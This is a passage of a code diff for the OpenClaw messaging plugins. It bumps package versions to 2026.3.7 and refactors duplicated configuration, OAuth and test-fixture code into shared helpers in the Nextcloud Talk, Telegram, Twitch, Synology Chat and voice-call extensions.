resolvedAccount.baseUrl) { - if (accountId === DEFAULT_ACCOUNT_ID) { - next = { - ...next, - channels: { - ...next.channels, - "nextcloud-talk": { - ...next.channels?.["nextcloud-talk"], - enabled: true, - baseUrl, - ...(secret ? { botSecret: secret } : {}), - }, - }, - }; - } else { - next = { - ...next, - channels: { - ...next.channels, - "nextcloud-talk": { - ...next.channels?.["nextcloud-talk"], - enabled: true, - accounts: { - ...next.channels?.["nextcloud-talk"]?.accounts, - [accountId]: { - ...next.channels?.["nextcloud-talk"]?.accounts?.[accountId], - enabled: - next.channels?.["nextcloud-talk"]?.accounts?.[accountId]?.enabled ?? true, - baseUrl, - ...(secret ? { botSecret: secret } : {}), - }, - }, - }, - }, - }; - } + next = setNextcloudTalkAccountConfig(next, accountId, { + baseUrl, + ...(secret ? { botSecret: secret } : {}), + }); } const existingApiUser = resolvedAccount.config.apiUser?.trim(); @@ -333,41 +311,10 @@ export const nextcloudTalkOnboardingAdapter: ChannelOnboardingAdapter = { preferredEnvVar: "NEXTCLOUD_TALK_API_PASSWORD", }); const apiPassword = apiPasswordResult.action === "set" ? apiPasswordResult.value : undefined; - if (accountId === DEFAULT_ACCOUNT_ID) { - next = { - ...next, - channels: { - ...next.channels, - "nextcloud-talk": { - ...next.channels?.["nextcloud-talk"], - enabled: true, - apiUser, - ...(apiPassword ? { apiPassword } : {}), - }, - }, - }; - } else { - next = { - ...next, - channels: { - ...next.channels, - "nextcloud-talk": { - ...next.channels?.["nextcloud-talk"], - enabled: true, - accounts: { - ...next.channels?.["nextcloud-talk"]?.accounts, - [accountId]: { - ...next.channels?.["nextcloud-talk"]?.accounts?.[accountId], - enabled: - next.channels?.["nextcloud-talk"]?.accounts?.[accountId]?.enabled ?? true, - apiUser, - ...(apiPassword ? { apiPassword } : {}), - }, - }, - }, - }, - }; - } + next = setNextcloudTalkAccountConfig(next, accountId, { + apiUser, + ...(apiPassword ? { apiPassword } : {}), + }); } if (forceAllowFrom) { diff --git a/extensions/nostr/CHANGELOG.md b/extensions/nostr/CHANGELOG.md index b9a57803672..f7755ac2933 100644 --- a/extensions/nostr/CHANGELOG.md +++ b/extensions/nostr/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/nostr/package.json b/extensions/nostr/package.json index 8afc0450856..a45bbf49927 100644 --- a/extensions/nostr/package.json +++ b/extensions/nostr/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/nostr", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Nostr channel plugin for NIP-04 encrypted DMs", "type": "module", "dependencies": { diff --git a/extensions/open-prose/package.json b/extensions/open-prose/package.json index 8c45daba14d..d9ef7626717 100644 --- a/extensions/open-prose/package.json +++ b/extensions/open-prose/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/open-prose", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenProse VM skill pack plugin (slash command + telemetry).", "type": "module", diff --git a/extensions/qwen-portal-auth/index.ts b/extensions/qwen-portal-auth/index.ts index c592c0e223c..643663c1ffa 100644 --- a/extensions/qwen-portal-auth/index.ts +++ b/extensions/qwen-portal-auth/index.ts @@ -1,4 +1,5 @@ import { + buildOauthProviderAuthResult, emptyPluginConfigSchema, type OpenClawPluginApi, type ProviderAuthContext, @@ -63,22 +64,14 @@ const qwenPortalPlugin = { progress.stop("Qwen OAuth complete"); - const profileId = `${PROVIDER_ID}:default`; const baseUrl = normalizeBaseUrl(result.resourceUrl); - return { - profiles: [ - { - profileId, - credential: { - type: "oauth", - provider: PROVIDER_ID, - access: result.access, - refresh: result.refresh, - expires: result.expires, - }, - }, - ], + return buildOauthProviderAuthResult({ + providerId: PROVIDER_ID, + defaultModel: DEFAULT_MODEL, + access: result.access, + refresh: result.refresh, + expires: result.expires, configPatch: { models: { providers: { @@ -110,12 +103,11 @@ const qwenPortalPlugin = { }, }, }, - defaultModel: DEFAULT_MODEL, notes: [ "Qwen OAuth tokens auto-refresh. Re-run login if refresh fails or access is revoked.", `Base URL defaults to ${DEFAULT_BASE_URL}. Override models.providers.${PROVIDER_ID}.baseUrl if needed.`, ], - }; + }); } catch (err) { progress.stop("Qwen OAuth failed"); await ctx.prompter.note( diff --git a/extensions/signal/package.json b/extensions/signal/package.json index 4c7e04ab090..d2e7a368b46 100644 --- a/extensions/signal/package.json +++ b/extensions/signal/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/signal", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Signal channel plugin", "type": "module", diff --git a/extensions/slack/package.json b/extensions/slack/package.json index 5dd8a3db902..49d217fb820 100644 --- a/extensions/slack/package.json +++ b/extensions/slack/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/slack", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Slack channel plugin", "type": "module", diff --git a/extensions/synology-chat/package.json b/extensions/synology-chat/package.json index e16c17d892c..3ac854c14f0 100644 --- a/extensions/synology-chat/package.json +++ b/extensions/synology-chat/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/synology-chat", - "version": "2026.3.3", + "version": "2026.3.7", "description": "Synology Chat channel plugin for OpenClaw", "type": "module", "dependencies": { diff --git a/extensions/synology-chat/src/channel.test.ts b/extensions/synology-chat/src/channel.test.ts index 713ecf7f8c3..4e3be192f39 100644 --- a/extensions/synology-chat/src/channel.test.ts +++ b/extensions/synology-chat/src/channel.test.ts @@ -317,20 +317,11 @@ describe("createSynologyChatPlugin", () => { }); describe("gateway", () => { - it("startAccount returns pending promise for disabled account", async () => { - const plugin = createSynologyChatPlugin(); - const abortController = new AbortController(); - const ctx = { - cfg: { - channels: { "synology-chat": { enabled: false } }, - }, - accountId: "default", - log: { info: vi.fn(), warn: vi.fn(), error: vi.fn() }, - abortSignal: abortController.signal, - }; - const result = plugin.gateway.startAccount(ctx); + async function expectPendingStartAccountPromise( + result: Promise, + abortController: AbortController, + ) { expect(result).toBeInstanceOf(Promise); - // Promise should stay pending (never resolve) to prevent restart loop const resolved = await Promise.race([ result, new Promise((r) => setTimeout(() => r("pending"), 50)), @@ -338,29 +329,29 @@ describe("createSynologyChatPlugin", () => { expect(resolved).toBe("pending"); abortController.abort(); await result; + } + + async function expectPendingStartAccount(accountConfig: Record) { + const plugin = createSynologyChatPlugin(); + const abortController = new AbortController(); + const ctx = { + cfg: { + channels: { "synology-chat": accountConfig }, + }, + accountId: "default", + log: { info: vi.fn(), warn: vi.fn(), error: vi.fn() }, + abortSignal: abortController.signal, + }; + const result = plugin.gateway.startAccount(ctx); + await expectPendingStartAccountPromise(result, abortController); + } + + it("startAccount returns pending promise for disabled account", async () => { + await expectPendingStartAccount({ enabled: false }); }); it("startAccount returns pending promise for account without token", async () => { - const plugin = createSynologyChatPlugin(); - const abortController = new AbortController(); - const ctx = { - cfg: { - channels: { "synology-chat": { enabled: true } }, - }, - accountId: "default", - log: { info: vi.fn(), warn: vi.fn(), error: vi.fn() }, - abortSignal: abortController.signal, - }; - const result = plugin.gateway.startAccount(ctx); - expect(result).toBeInstanceOf(Promise); - // Promise should stay pending (never resolve) to prevent restart loop - const resolved = await Promise.race([ - result, - new Promise((r) => setTimeout(() => r("pending"), 50)), - ]); - expect(resolved).toBe("pending"); - abortController.abort(); - await result; + await expectPendingStartAccount({ enabled: true }); }); it("startAccount refuses allowlist accounts with empty allowedUserIds", async () => { @@ -387,16 +378,9 @@ describe("createSynologyChatPlugin", () => { }; const result = plugin.gateway.startAccount(ctx); - expect(result).toBeInstanceOf(Promise); - const resolved = await Promise.race([ - result, - new Promise((r) => setTimeout(() => r("pending"), 50)), - ]); - expect(resolved).toBe("pending"); + await expectPendingStartAccountPromise(result, abortController); expect(ctx.log.warn).toHaveBeenCalledWith(expect.stringContaining("empty allowedUserIds")); expect(registerMock).not.toHaveBeenCalled(); - abortController.abort(); - await result; }); it("deregisters stale route before re-registering same account/path", async () => { diff --git a/extensions/synology-chat/src/client.test.ts b/extensions/synology-chat/src/client.test.ts index ef5ff06beb7..416412f0408 100644 --- a/extensions/synology-chat/src/client.test.ts +++ b/extensions/synology-chat/src/client.test.ts @@ -118,26 +118,21 @@ describe("sendFileUrl", () => { function mockUserListResponse( users: Array<{ user_id: number; username: string; nickname: string }>, ) { - const httpsGet = vi.mocked((https as any).get); - httpsGet.mockImplementation((_url: any, _opts: any, callback: any) => { - const res = new EventEmitter() as any; - res.statusCode = 200; - process.nextTick(() => { - callback(res); - res.emit("data", Buffer.from(JSON.stringify({ success: true, data: { users } }))); - res.emit("end"); - }); - const req = new EventEmitter() as any; - req.destroy = vi.fn(); - return req; - }); + mockUserListResponseImpl(users, false); } function mockUserListResponseOnce( users: Array<{ user_id: number; username: string; nickname: string }>, +) { + mockUserListResponseImpl(users, true); +} + +function mockUserListResponseImpl( + users: Array<{ user_id: number; username: string; nickname: string }>, + once: boolean, ) { const httpsGet = vi.mocked((https as any).get); - httpsGet.mockImplementationOnce((_url: any, _opts: any, callback: any) => { + const impl = (_url: any, _opts: any, callback: any) => { const res = new EventEmitter() as any; res.statusCode = 200; process.nextTick(() => { @@ -148,7 +143,12 @@ function mockUserListResponseOnce( const req = new EventEmitter() as any; req.destroy = vi.fn(); return req; - }); + }; + if (once) { + httpsGet.mockImplementationOnce(impl); + return; + } + httpsGet.mockImplementation(impl); } describe("resolveChatUserId", () => { diff --git a/extensions/telegram/package.json b/extensions/telegram/package.json index 44013315ef8..f000bd126f6 100644 --- a/extensions/telegram/package.json +++ b/extensions/telegram/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/telegram", - "version": "2026.3.3", + "version": "2026.3.7", "private": true, "description": "OpenClaw Telegram channel plugin", "type": "module", diff --git a/extensions/telegram/src/channel.test.ts b/extensions/telegram/src/channel.test.ts index 5f755a7284b..7473bb5e533 100644 --- a/extensions/telegram/src/channel.test.ts +++ b/extensions/telegram/src/channel.test.ts @@ -52,6 +52,25 @@ function createStartAccountCtx(params: { }; } +function installGatewayRuntime(params?: { probeOk?: boolean; botUsername?: string }) { + const monitorTelegramProvider = vi.fn(async () => undefined); + const probeTelegram = vi.fn(async () => + params?.probeOk ? { ok: true, bot: { username: params.botUsername ?? "bot" } } : { ok: false }, + ); + setTelegramRuntime({ + channel: { + telegram: { + monitorTelegramProvider, + probeTelegram, + }, + }, + logging: { + shouldLogVerbose: () => false, + }, + } as unknown as PluginRuntime); + return { monitorTelegramProvider, probeTelegram }; +} + describe("telegramPlugin duplicate token guard", () => { it("marks secondary account as not configured when token is shared", async () => { const cfg = createCfg(); @@ -84,20 +103,7 @@ describe("telegramPlugin duplicate token guard", () => { }); it("blocks startup for duplicate token accounts before polling starts", async () => { - const monitorTelegramProvider = vi.fn(async () => undefined); - const probeTelegram = vi.fn(async () => ({ ok: true, bot: { username: "bot" } })); - const runtime = { - channel: { - telegram: { - monitorTelegramProvider, - probeTelegram, - }, - }, - logging: { - shouldLogVerbose: () => false, - }, - } as unknown as PluginRuntime; - setTelegramRuntime(runtime); + const { monitorTelegramProvider, probeTelegram } = installGatewayRuntime({ probeOk: true }); await expect( telegramPlugin.gateway!.startAccount!( @@ -114,20 +120,10 @@ describe("telegramPlugin duplicate token guard", () => { }); it("passes webhookPort through to monitor startup options", async () => { - const monitorTelegramProvider = vi.fn(async () => undefined); - const probeTelegram = vi.fn(async () => ({ ok: true, bot: { username: "opsbot" } })); - const runtime = { - channel: { - telegram: { - monitorTelegramProvider, - probeTelegram, - }, - }, - logging: { - shouldLogVerbose: () => false, - }, - } as unknown as PluginRuntime; - setTelegramRuntime(runtime); + const { monitorTelegramProvider } = installGatewayRuntime({ + probeOk: true, + botUsername: "opsbot", + }); const cfg = createCfg(); cfg.channels!.telegram!.accounts!.ops = { @@ -192,20 +188,7 @@ describe("telegramPlugin duplicate token guard", () => { }); it("does not crash startup when a resolved account token is undefined", async () => { - const monitorTelegramProvider = vi.fn(async () => undefined); - const probeTelegram = vi.fn(async () => ({ ok: false })); - const runtime = { - channel: { - telegram: { - monitorTelegramProvider, - probeTelegram, - }, - }, - logging: { - shouldLogVerbose: () => false, - }, - } as unknown as PluginRuntime; - setTelegramRuntime(runtime); + const { monitorTelegramProvider } = installGatewayRuntime({ probeOk: false }); const cfg = createCfg(); const ctx = createStartAccountCtx({ diff --git a/extensions/telegram/src/channel.ts b/extensions/telegram/src/channel.ts index f7c2ad16328..ccb22dab55b 100644 --- a/extensions/telegram/src/channel.ts +++ b/extensions/telegram/src/channel.ts @@ -2,6 +2,7 @@ import { applyAccountNameToChannelSection, buildChannelConfigSchema, buildTokenChannelStatusSummary, + clearAccountEntryFields, collectTelegramStatusIssues, DEFAULT_ACCOUNT_ID, deleteAccountFromConfigSection, @@ -519,36 +520,20 @@ export const telegramPlugin: ChannelPlugin; - if ("botToken" in nextEntry) { - const token = nextEntry.botToken; - if (typeof token === "string" ? token.trim() : token) { - cleared = true; - } - delete nextEntry.botToken; - changed = true; - } - if (Object.keys(nextEntry).length === 0) { - delete accounts[accountId]; - changed = true; - } else { - accounts[accountId] = nextEntry as typeof entry; - } + const accountCleanup = clearAccountEntryFields({ + accounts: nextTelegram.accounts, + accountId, + fields: ["botToken"], + }); + if (accountCleanup.changed) { + changed = true; + if (accountCleanup.cleared) { + cleared = true; } - } - if (accounts) { - if (Object.keys(accounts).length === 0) { - delete nextTelegram.accounts; - changed = true; + if (accountCleanup.nextAccounts) { + nextTelegram.accounts = accountCleanup.nextAccounts; } else { - nextTelegram.accounts = accounts; + delete nextTelegram.accounts; } } } diff --git a/extensions/tlon/package.json b/extensions/tlon/package.json index 319dfde7613..7aa2336b285 100644 --- a/extensions/tlon/package.json +++ b/extensions/tlon/package.json @@ -1,13 +1,12 @@ { "name": "@openclaw/tlon", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Tlon/Urbit channel plugin", "type": "module", "dependencies": { - "@tloncorp/api": "git+https://github.com/tloncorp/api-beta.git#7eede1c1a756977b09f96aa14a92e2b06318ae87", - "@tloncorp/tlon-skill": "0.1.9", + "@tloncorp/api": "github:tloncorp/api-beta#7eede1c1a756977b09f96aa14a92e2b06318ae87", + "@tloncorp/tlon-skill": "0.2.2", "@urbit/aura": "^3.0.0", - "@urbit/http-api": "^3.0.0", "zod": "^4.3.6" }, "openclaw": { diff --git a/extensions/twitch/CHANGELOG.md b/extensions/twitch/CHANGELOG.md index 1d317162a37..f83dd85a9f0 100644 --- a/extensions/twitch/CHANGELOG.md +++ b/extensions/twitch/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/twitch/package.json b/extensions/twitch/package.json index 2c8d0502932..1dbc4040325 100644 --- a/extensions/twitch/package.json +++ b/extensions/twitch/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/twitch", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw Twitch channel plugin", "type": "module", "dependencies": { diff --git a/extensions/twitch/src/access-control.test.ts b/extensions/twitch/src/access-control.test.ts index 83746717e4a..874326c9697 100644 --- a/extensions/twitch/src/access-control.test.ts +++ b/extensions/twitch/src/access-control.test.ts @@ -51,14 +51,10 @@ describe("checkTwitchAccessControl", () => { describe("when no restrictions are configured", () => { it("allows messages that mention the bot (default requireMention)", () => { - const message: TwitchChatMessage = { - ...mockMessage, - message: "@testbot hello", - }; - const result = checkTwitchAccessControl({ - message, - account: mockAccount, - botUsername: "testbot", + const result = runAccessCheck({ + message: { + message: "@testbot hello", + }, }); expect(result.allowed).toBe(true); }); @@ -66,30 +62,20 @@ describe("checkTwitchAccessControl", () => { describe("requireMention default", () => { it("defaults to true when undefined", () => { - const message: TwitchChatMessage = { - ...mockMessage, - message: "hello bot", - }; - - const result = checkTwitchAccessControl({ - message, - account: mockAccount, - botUsername: "testbot", + const result = runAccessCheck({ + message: { + message: "hello bot", + }, }); expect(result.allowed).toBe(false); expect(result.reason).toContain("does not mention the bot"); }); it("allows mention when requireMention is undefined", () => { - const message: TwitchChatMessage = { - ...mockMessage, - message: "@testbot hello", - }; - - const result = checkTwitchAccessControl({ - message, - account: mockAccount, - botUsername: "testbot", + const result = runAccessCheck({ + message: { + message: "@testbot hello", + }, }); expect(result.allowed).toBe(true); }); @@ -97,52 +83,25 @@ describe("checkTwitchAccessControl", () => { describe("requireMention", () => { it("allows messages that mention the bot", () => { - const account: TwitchAccountConfig = { - ...mockAccount, - requireMention: true, - }; - const message: TwitchChatMessage = { - ...mockMessage, - message: "@testbot hello", - }; - - const result = checkTwitchAccessControl({ - message, - account, - botUsername: "testbot", + const result = runAccessCheck({ + account: { requireMention: true }, + message: { message: "@testbot hello" }, }); expect(result.allowed).toBe(true); }); it("blocks messages that don't mention the bot", () => { - const account: TwitchAccountConfig = { - ...mockAccount, - requireMention: true, - }; - - const result = checkTwitchAccessControl({ - message: mockMessage, - account, - botUsername: "testbot", + const result = runAccessCheck({ + account: { requireMention: true }, }); expect(result.allowed).toBe(false); expect(result.reason).toContain("does not mention the bot"); }); it("is case-insensitive for bot username", () => { - const account: TwitchAccountConfig = { - ...mockAccount, - requireMention: true, - }; - const message: TwitchChatMessage = { - ...mockMessage, - message: "@TestBot hello", - }; - - const result = checkTwitchAccessControl({ - message, - account, - botUsername: "testbot", + const result = runAccessCheck({ + account: { requireMention: true }, + message: { message: "@TestBot hello" }, }); expect(result.allowed).toBe(true); }); diff --git a/extensions/twitch/src/status.test.ts b/extensions/twitch/src/status.test.ts index 7aa8b909df3..d0340ec852e 100644 --- a/extensions/twitch/src/status.test.ts +++ b/extensions/twitch/src/status.test.ts @@ -14,17 +14,28 @@ import { describe, expect, it } from "vitest"; import { collectTwitchStatusIssues } from "./status.js"; import type { ChannelAccountSnapshot } from "./types.js"; +function createSnapshot(overrides: Partial = {}): ChannelAccountSnapshot { + return { + accountId: "default", + configured: true, + enabled: true, + running: false, + ...overrides, + }; +} + +function createSimpleTwitchConfig(overrides: Record) { + return { + channels: { + twitch: overrides, + }, + }; +} + describe("status", () => { describe("collectTwitchStatusIssues", () => { it("should detect unconfigured accounts", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: false, - enabled: true, - running: false, - }, - ]; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot({ configured: false })]; const issues = collectTwitchStatusIssues(snapshots); @@ -34,14 +45,7 @@ describe("status", () => { }); it("should detect disabled accounts", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: false, - running: false, - }, - ]; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot({ enabled: false })]; const issues = collectTwitchStatusIssues(snapshots); @@ -51,24 +55,12 @@ describe("status", () => { }); it("should detect missing clientId when account configured (simplified config)", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - }, - ]; - - const mockCfg = { - channels: { - twitch: { - username: "testbot", - accessToken: "oauth:test123", - // clientId missing - }, - }, - }; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot()]; + const mockCfg = createSimpleTwitchConfig({ + username: "testbot", + accessToken: "oauth:test123", + // clientId missing + }); const issues = collectTwitchStatusIssues(snapshots, () => mockCfg as never); @@ -77,24 +69,12 @@ describe("status", () => { }); it("should warn about oauth: prefix in token (simplified config)", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - }, - ]; - - const mockCfg = { - channels: { - twitch: { - username: "testbot", - accessToken: "oauth:test123", // has prefix - clientId: "test-id", - }, - }, - }; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot()]; + const mockCfg = createSimpleTwitchConfig({ + username: "testbot", + accessToken: "oauth:test123", // has prefix + clientId: "test-id", + }); const issues = collectTwitchStatusIssues(snapshots, () => mockCfg as never); @@ -104,26 +84,14 @@ describe("status", () => { }); it("should detect clientSecret without refreshToken (simplified config)", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - }, - ]; - - const mockCfg = { - channels: { - twitch: { - username: "testbot", - accessToken: "oauth:test123", - clientId: "test-id", - clientSecret: "secret123", - // refreshToken missing - }, - }, - }; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot()]; + const mockCfg = createSimpleTwitchConfig({ + username: "testbot", + accessToken: "oauth:test123", + clientId: "test-id", + clientSecret: "secret123", + // refreshToken missing + }); const issues = collectTwitchStatusIssues(snapshots, () => mockCfg as never); @@ -132,25 +100,13 @@ describe("status", () => { }); it("should detect empty allowFrom array (simplified config)", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - }, - ]; - - const mockCfg = { - channels: { - twitch: { - username: "testbot", - accessToken: "test123", - clientId: "test-id", - allowFrom: [], // empty array - }, - }, - }; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot()]; + const mockCfg = createSimpleTwitchConfig({ + username: "testbot", + accessToken: "test123", + clientId: "test-id", + allowFrom: [], // empty array + }); const issues = collectTwitchStatusIssues(snapshots, () => mockCfg as never); @@ -159,26 +115,14 @@ describe("status", () => { }); it("should detect allowedRoles 'all' with allowFrom conflict (simplified config)", () => { - const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - }, - ]; - - const mockCfg = { - channels: { - twitch: { - username: "testbot", - accessToken: "test123", - clientId: "test-id", - allowedRoles: ["all"], - allowFrom: ["123456"], // conflict! - }, - }, - }; + const snapshots: ChannelAccountSnapshot[] = [createSnapshot()]; + const mockCfg = createSimpleTwitchConfig({ + username: "testbot", + accessToken: "test123", + clientId: "test-id", + allowedRoles: ["all"], + allowFrom: ["123456"], // conflict! + }); const issues = collectTwitchStatusIssues(snapshots, () => mockCfg as never); @@ -189,13 +133,7 @@ describe("status", () => { it("should detect runtime errors", () => { const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, - lastError: "Connection timeout", - }, + createSnapshot({ lastError: "Connection timeout" }), ]; const issues = collectTwitchStatusIssues(snapshots); @@ -207,15 +145,11 @@ describe("status", () => { it("should detect accounts that never connected", () => { const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, - running: false, + createSnapshot({ lastStartAt: undefined, lastInboundAt: undefined, lastOutboundAt: undefined, - }, + }), ]; const issues = collectTwitchStatusIssues(snapshots); @@ -230,13 +164,10 @@ describe("status", () => { const oldDate = Date.now() - 8 * 24 * 60 * 60 * 1000; // 8 days ago const snapshots: ChannelAccountSnapshot[] = [ - { - accountId: "default", - configured: true, - enabled: true, + createSnapshot({ running: true, lastStartAt: oldDate, - }, + }), ]; const issues = collectTwitchStatusIssues(snapshots); diff --git a/extensions/voice-call/CHANGELOG.md b/extensions/voice-call/CHANGELOG.md index 3767703a0be..a91dd5c4d40 100644 --- a/extensions/voice-call/CHANGELOG.md +++ b/extensions/voice-call/CHANGELOG.md @@ -1,5 +1,11 @@ # Changelog +## 2026.3.7 + +### Changes + +- Version alignment with core OpenClaw release numbers. + ## 2026.3.3 ### Changes diff --git a/extensions/voice-call/index.ts b/extensions/voice-call/index.ts index bc7ae59c046..d09b3c68057 100644 --- a/extensions/voice-call/index.ts +++ b/extensions/voice-call/index.ts @@ -219,6 +219,23 @@ const voiceCallPlugin = { const rt = await ensureRuntime(); return { rt, callId, message } as const; }; + const initiateCallAndRespond = async (params: { + rt: VoiceCallRuntime; + respond: GatewayRequestHandlerOptions["respond"]; + to: string; + message?: string; + mode?: "notify" | "conversation"; + }) => { + const result = await params.rt.manager.initiateCall(params.to, undefined, { + message: params.message, + mode: params.mode, + }); + if (!result.success) { + params.respond(false, { error: result.error || "initiate failed" }); + return; + } + params.respond(true, { callId: result.callId, initiated: true }); + }; api.registerGatewayMethod( "voicecall.initiate", @@ -240,15 +257,13 @@ const voiceCallPlugin = { } const mode = params?.mode === "notify" || params?.mode === "conversation" ? params.mode : undefined; - const result = await rt.manager.initiateCall(to, undefined, { + await initiateCallAndRespond({ + rt, + respond, + to, message, mode, }); - if (!result.success) { - respond(false, { error: result.error || "initiate failed" }); - return; - } - respond(true, { callId: result.callId, initiated: true }); } catch (err) { sendError(respond, err); } @@ -357,14 +372,12 @@ const voiceCallPlugin = { return; } const rt = await ensureRuntime(); - const result = await rt.manager.initiateCall(to, undefined, { + await initiateCallAndRespond({ + rt, + respond, + to, message: message || undefined, }); - if (!result.success) { - respond(false, { error: result.error || "initiate failed" }); - return; - } - respond(true, { callId: result.callId, initiated: true }); } catch (err) { sendError(respond, err); } diff --git a/extensions/voice-call/package.json b/extensions/voice-call/package.json index 3e2834068d3..bba0088ae0d 100644 --- a/extensions/voice-call/package.json +++ b/extensions/voice-call/package.json @@ -1,6 +1,6 @@ { "name": "@openclaw/voice-call", - "version": "2026.3.3", + "version": "2026.3.7", "description": "OpenClaw voice-call plugin", "type": "module", "dependencies": { diff --git a/extensions/voice-call/src/config.test.ts b/extensions/voice-call/src/config.test.ts index ba1889edb4f..03cc011fc66 100644 --- a/extensions/voice-call/src/config.test.ts +++ b/extensions/voice-call/src/config.test.ts @@ -1,49 +1,9 @@ import { afterEach, beforeEach, describe, expect, it } from "vitest"; import { validateProviderConfig, resolveVoiceCallConfig, type VoiceCallConfig } from "./config.js"; +import { createVoiceCallBaseConfig } from "./test-fixtures.js"; function createBaseConfig(provider: "telnyx" | "twilio" | "plivo" | "mock"): VoiceCallConfig { - return { - enabled: true, - provider, - fromNumber: "+15550001234", - inboundPolicy: "disabled", - allowFrom: [], - outbound: { defaultMode: "notify", notifyHangupDelaySec: 3 }, - maxDurationSeconds: 300, - staleCallReaperSeconds: 600, - silenceTimeoutMs: 800, - transcriptTimeoutMs: 180000, - ringTimeoutMs: 30000, - maxConcurrentCalls: 1, - serve: { port: 3334, bind: "127.0.0.1", path: "/voice/webhook" }, - tailscale: { mode: "off", path: "/voice/webhook" }, - tunnel: { provider: "none", allowNgrokFreeTierLoopbackBypass: false }, - webhookSecurity: { - allowedHosts: [], - trustForwardingHeaders: false, - trustedProxyIPs: [], - }, - streaming: { - enabled: false, - sttProvider: "openai-realtime", - sttModel: "gpt-4o-transcribe", - silenceDurationMs: 800, - vadThreshold: 0.5, - streamPath: "/voice/stream", - preStartTimeoutMs: 5000, - maxPendingConnections: 32, - maxPendingConnectionsPerIp: 4, - maxConnections: 128, - }, - skipSignatureVerification: false, - stt: { provider: "openai", model: "whisper-1" }, - tts: { - provider: "openai", - openai: { model: "gpt-4o-mini-tts", voice: "coral" }, - }, - responseModel: "openai/gpt-4o-mini", - responseTimeoutMs: 30000, - }; + return createVoiceCallBaseConfig({ provider }); } describe("validateProviderConfig", () => { diff --git a/extensions/voice-call/src/providers/tts-openai.ts b/extensions/voice-call/src/providers/tts-openai.ts index c483d681990..d1c95420392 100644 --- a/extensions/voice-call/src/providers/tts-openai.ts +++ b/extensions/voice-call/src/providers/tts-openai.ts @@ -1,3 +1,5 @@ +import { pcmToMulaw } from "../telephony-audio.js"; + /** * OpenAI TTS Provider * @@ -179,55 +181,6 @@ function clamp16(value: number): number { return Math.max(-32768, Math.min(32767, value)); } -/** - * Convert 16-bit PCM to 8-bit mu-law. - * Standard G.711 mu-law encoding for telephony. - */ -function pcmToMulaw(pcm: Buffer): Buffer { - const samples = pcm.length / 2; - const mulaw = Buffer.alloc(samples); - - for (let i = 0; i < samples; i++) { - const sample = pcm.readInt16LE(i * 2); - mulaw[i] = linearToMulaw(sample); - } - - return mulaw; -} - -/** - * Convert a single 16-bit linear sample to 8-bit mu-law. - * Implements ITU-T G.711 mu-law encoding. - */ -function linearToMulaw(sample: number): number { - const BIAS = 132; - const CLIP = 32635; - - // Get sign bit - const sign = sample < 0 ? 0x80 : 0; - if (sample < 0) { - sample = -sample; - } - - // Clip to prevent overflow - if (sample > CLIP) { - sample = CLIP; - } - - // Add bias and find segment - sample += BIAS; - let exponent = 7; - for (let expMask = 0x4000; (sample & expMask) === 0 && exponent > 0; exponent--, expMask >>= 1) { - // Find the segment (exponent) - } - - // Extract mantissa bits - const mantissa = (sample >> (exponent + 3)) & 0x0f; - - // Combine into mu-law byte (inverted for transmission) - return ~(sign | (exponent << 4) | mantissa) & 0xff; -} - /** * Convert 8-bit mu-law to 16-bit linear PCM. * Useful for decoding incoming audio. diff --git a/extensions/voice-call/src/runtime.test.ts b/extensions/voice-call/src/runtime.test.ts index 26cdbea82cc..dcb8fa2a158 100644 --- a/extensions/voice-call/src/runtime.test.ts +++ b/extensions/voice-call/src/runtime.test.ts @@ -1,6 +1,7 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; import type { VoiceCallConfig } from "./config.js"; import type { CoreConfig } from "./core-bridge.js"; +import { createVoiceCallBaseConfig } from "./test-fixtures.js"; const mocks = vi.hoisted(() => ({ resolveVoiceCallConfig: vi.fn(), @@ -45,48 +46,7 @@ vi.mock("./webhook/tailscale.js", () => ({ import { createVoiceCallRuntime } from "./runtime.js"; function createBaseConfig(): VoiceCallConfig { - return { - enabled: true, - provider: "mock", - fromNumber: "+15550001234", - inboundPolicy: "disabled", - allowFrom: [], - outbound: { defaultMode: "notify", notifyHangupDelaySec: 3 }, - maxDurationSeconds: 300, - staleCallReaperSeconds: 600, - silenceTimeoutMs: 800, - transcriptTimeoutMs: 180000, - ringTimeoutMs: 30000, - maxConcurrentCalls: 1, - serve: { port: 3334, bind: "127.0.0.1", path: "/voice/webhook" }, - tailscale: { mode: "off", path: "/voice/webhook" }, - tunnel: { 